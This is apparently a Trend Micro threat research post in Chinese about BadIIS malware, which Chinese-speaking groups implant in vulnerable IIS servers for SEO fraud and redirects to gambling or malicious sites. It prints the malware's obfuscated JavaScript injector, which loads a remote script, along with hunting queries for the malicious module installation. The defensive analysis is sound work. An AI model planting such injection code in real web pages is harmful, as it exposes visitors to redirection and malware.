中文黑客组织利用BadIIS操纵SEO | 趋势科技（美国）

关键要点

趋势科技研究人员观察到一起SEO操纵活动，突显了使用Internet信息服务（IIS）的组织需要主动更新和修补系统，以防止威胁行为者在其活动中使用BadIIS等恶意软件进行利用。

该活动很可能出于经济动机，因为将用户重定向到非法赌博网站表明攻击者部署BadIIS是为了获利。

此活动已经影响了亚洲国家，如印度、泰国和越南。然而，其影响可能超越地理边界。

攻击概述

2024年，我们在亚洲观察到大量分发名为“BadIIS”的恶意软件。BadIIS针对Internet信息服务（IIS），可用于SEO欺诈或将恶意内容注入合法用户的浏览器。这包括显示未经授权的广告、分发恶意软件，甚至进行针对特定群体的水坑攻击。在此活动中，威胁行为者利用易受攻击的IIS服务器在受感染的服务器上安装BadIIS恶意软件。一旦用户向受感染的服务器发送请求，他们可能会收到攻击者篡改的内容。这可能导致两种潜在结果：

• 连接到非法赌博网站：修改的内容将用户重定向到涉及非法赌博活动的网站。
• 连接到恶意服务器：用户被重定向到攻击者控制的服务器，这些服务器托管恶意内容，如恶意软件或网络钓鱼方案。

基于文件普查和网络流量，我们确定了受影响地区，包括印度、泰国、越南、菲律宾、新加坡、台湾、韩国、日本和巴西。我们还观察到孟加拉国作为潜在目标。受攻击的IIS服务器包括政府、大学、科技公司和电信部门拥有的机器。我们注意到受影响地区并不限于受感染机器的位置。在大多数情况下，受害者位于同一地区；然而，我们发现一些受害者在访问不同地区的受感染服务器时受到影响。

通过从样本中获取的信息（例如，提取的域、简体中文编写的字符串），我们认为这些变体很可能由中文团体制作和部署。

BadIIS安装

攻击者之一在成功利用IIS服务器后，使用包含以下命令的批处理文件安装BadIIS模块。以下是用于BadIIS安装的脚本：

SEO操纵方案中的关键功能和关键词

在分析此活动中使用的变体后，我们发现它们在功能和URL模式上与Group11先前使用的变体有相似之处，如Black Hat USA 2021演讲的白皮书中所述。然而，新变体具有一个名为“OnSendResponse”的处理程序，而不是“OnBeginRequest”。

SEO欺诈模式

安装的BadIIS可以更改从Web服务器请求的HTTP响应头信息。它检查接收到的HTTP头中的“User-Agent”和“Referer”字段。如果这些字段包含特定的搜索门户网站或关键词，BadIIS会将用户重定向到与在线非法赌博网站相关的页面，而不是合法的网页。此功能旨在识别可能用于SEO欺诈的搜索引擎爬虫流量。

• User-Agent字段中的关键词检查：360、baidu、bing、coccoc、daum、google、naver、sogou、yisou
• Referer字段中的关键词检查：baidu.com、bing.com、Coccoc、daum.net、google、naver.com、so.com、sogou.com、sm.cn

注入器模式

在此模式下，安装的BadIIS会将可疑的JavaScript代码注入到对合法访问者请求的典型响应中。因此，访问者将被重定向到恶意网站。

以下混淆代码用于注入：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

<script type = "text/javascript"> eval(function(p, a, c, k, e, r) {
    e = function(c) {
        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) r[e(c)] = k[c] || e(c);
        k = [function(e) {
            return r[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--)
        if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p
}('m(d(p,a,c,k,e,r){e=d(c){f c.n(a)};h(!\'\'.i(/^/,o)){j(c--)r[e(c)]=k[c]||e(c);k=[d(e){f r[e]}];e=d(){f\'\\\\w+\'};c=1};j(c--)h(k[c])p=p.i(q s(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);f p}(\'1["2"]["3"](\\\'<0 4="5/6" 7="8://9.a/b.c"></0>\\\');\',l,l,\'t|u|v|x|y|z|A|B|C|D|E|F|G\'.H(\'|\'),0,{}))', 44, 44, '|||||||||||||function||return||if|replace|while||13|eval|toString|String||new||RegExp|script|window|document||write|type|text|javascript|src|{js}|split'.split('|'), 0, {})) </script>

C&C URL使用单XOR密钥“0x03”加密，并在运行时解密。解码后的代码如下：

1

document.write(<script type="text/javascript" src={malicious URL}></script>)

结论与IIS安全的重要性

IIS是许多组织广泛采用的服务之一，其滥用可能导致严重后果。攻击者可以利用IIS漏洞向受感染网站的合法访问者提供恶意内容。在最近的活动中，新变体主要用于提供与在线赌博相关的内容。这种方法可以轻松适应大规模恶意软件分发和针对特定群体的水坑攻击。

因此，网站所有者面临重大风险，包括声誉受损、潜在法律后果和用户信任丧失，所有这些都由于其Web服务器缺乏安全性。为了减轻这些风险，IT经理应实施以下最佳实践：

• 识别可能易受攻击的资产，并确保定期检查最新安全补丁。
• 监控异常的IIS模块安装，特别关注位于不常见目录中的已安装映像。
• 限制对IIS服务器的管理访问，并为所有特权帐户强制执行强唯一密码和多因素认证（MFA）。
• 使用防火墙控制和监控进出IIS服务器的网络流量，限制暴露于潜在威胁。
• 持续监控IIS服务器日志，以检测异常，如异常模块安装或服务器行为的意外变化。
• 通过禁用不必要的服务和功能确保安全配置，进一步最小化攻击面并加强整体服务器安全性。

Trend Vision One™

Trend Vision One™是一个企业网络安全平台，通过整合多种安全功能、增强对企业攻击面的控制，并提供对其网络风险状况的完全可见性，简化安全并帮助企业更快地检测和阻止威胁。该基于云的平台利用来自全球2.5亿个传感器和16个威胁研究中心的AI和威胁情报，在单一解决方案中提供全面的风险洞察、更早的威胁检测以及自动化的风险和威胁响应选项。

Trend Vision One威胁情报

为了领先于不断演变的威胁，Trend Vision One客户可以访问一系列情报报告和威胁洞察。威胁洞察帮助客户在网络威胁发生之前保持领先，并通过提供关于威胁行为者、其恶意活动及其技术的全面信息，让他们为新兴威胁做好准备。通过利用此情报，客户可以采取主动步骤保护其环境、减轻风险并有效响应威胁。

• Trend Vision One情报报告应用 [IOC扫描]
• Trend Vision One威胁洞察应用：新兴威胁：中文团体利用BadIIS操纵SEO

狩猎查询

Trend Vision One客户可以使用搜索应用匹配或狩猎此博客文章中提到的恶意指标与其环境中的数据。

BadIIS复制路径：

1
2

eventSubId:105 AND (objectFilePath: "C:\ProgramData\Microsoft\DRM\HttpCgiModule.dll" OR objectFilePath: "C:\ProgramData\Microsoft\DRM\HttpFastCgiModule.dll")
objectCmd:"*install module /name:* /image:C:\\ProgramData\\Microsoft\\DRM\\*" OR processCmd:"*install module /name:* /image:C:\\ProgramData\\Microsoft\\DRM\\*"

更多狩猎查询可用于已启用威胁洞察授权的Trend Vision One客户。

妥协指标

此条目的妥协指标可在此处找到。

标签

恶意软件 | Web | 研究 | 文章、新闻、报告

作者

• Ted Lee，威胁研究员
• Lenart Bermejo，威胁分析师

相关文章

• 关键Langflow漏洞（CVE-2025-3248）被主动利用以分发Flodrix僵尸网络
• 重新审视UNC3886战术以防御当前风险
• 回归业务：Lumma Stealer以更隐蔽的方法回归

[查看所有文章]